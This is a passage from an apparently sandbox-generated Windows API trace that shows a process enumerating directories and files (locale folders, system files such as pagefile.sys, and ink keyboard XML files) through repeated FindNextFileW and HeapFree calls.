nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0171.381] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.381] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0171.382] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.382] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0171.382] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.382] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0171.382] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.382] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0171.382] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.382] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0171.382] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.382] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0171.383] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.383] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0x0, dwReserved1=0x240000, cFileName="updaterevokesipolicy.p7b", cAlternateFileName="UPDATE~1.P7B")) returned 1 [0171.383] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.383] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0171.383] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.383] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0171.383] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.383] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0171.383] FindClose (in: hFindFile=0x802398 | out: hFindFile=0x802398) returned 1 [0171.383] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0171.383] FindNextFileW (in: hFindFile=0x8020d8, lpFindFileData=0x391fcf8 | out: lpFindFileData=0x391fcf8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x77970000, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0171.384] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ee7268 | out: hHeap=0x710000) returned 1 [0171.384] FindNextFileW (in: hFindFile=0x8020d8, lpFindFileData=0x391fcf8 | out: lpFindFileData=0x391fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0171.384] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ee7268 | out: hHeap=0x710000) returned 1 [0171.384] FindNextFileW (in: hFindFile=0x8020d8, lpFindFileData=0x391fcf8 | out: lpFindFileData=0x391fcf8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab460c6f, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0171.390] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ee7268 | out: hHeap=0x710000) returned 1 [0171.390] FindNextFileW (in: hFindFile=0x8020d8, lpFindFileData=0x391fcf8 | out: lpFindFileData=0x391fcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xaced8ceb, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0171.391] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ee7268 | out: hHeap=0x710000) returned 1 [0171.391] FindNextFileW (in: hFindFile=0x8020d8, lpFindFileData=0x391fcf8 | out: lpFindFileData=0x391fcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x589db39, ftLastAccessTime.dwHighDateTime=0x1d5f12b, ftLastWriteTime.dwLowDateTime=0x589db39, ftLastWriteTime.dwHighDateTime=0x1d5f12b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0171.391] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.391] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0171.394] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0171.394] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ink", cAlternateFileName="")) returned 1 [0171.395] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.395] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0171.395] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.395] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0171.395] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.395] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0171.395] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.396] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0171.396] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.396] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0171.396] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.396] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0171.396] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.396] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0171.399] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.399] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0171.399] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.399] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0171.399] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.399] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0171.399] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.399] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0171.399] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.399] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd11f8841, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd11f8841, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0171.400] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.400] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0171.400] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.400] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0171.670] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0171.703] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0171.703] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0171.703] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="insert.xml", cAlternateFileName="")) returned 1 [0171.704] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0171.704] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0171.706] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0171.706] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadda, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="main.xml", cAlternateFileName="")) returned 1 [0171.706] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0171.706] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskclearui.xml", cAlternateFileName="")) returned 1 [0171.706] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0171.706] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0171.706] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0171.706] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknav.xml", cAlternateFileName="")) returned 1 [0171.707] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0171.707] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0171.707] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0171.707] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f08c | out: 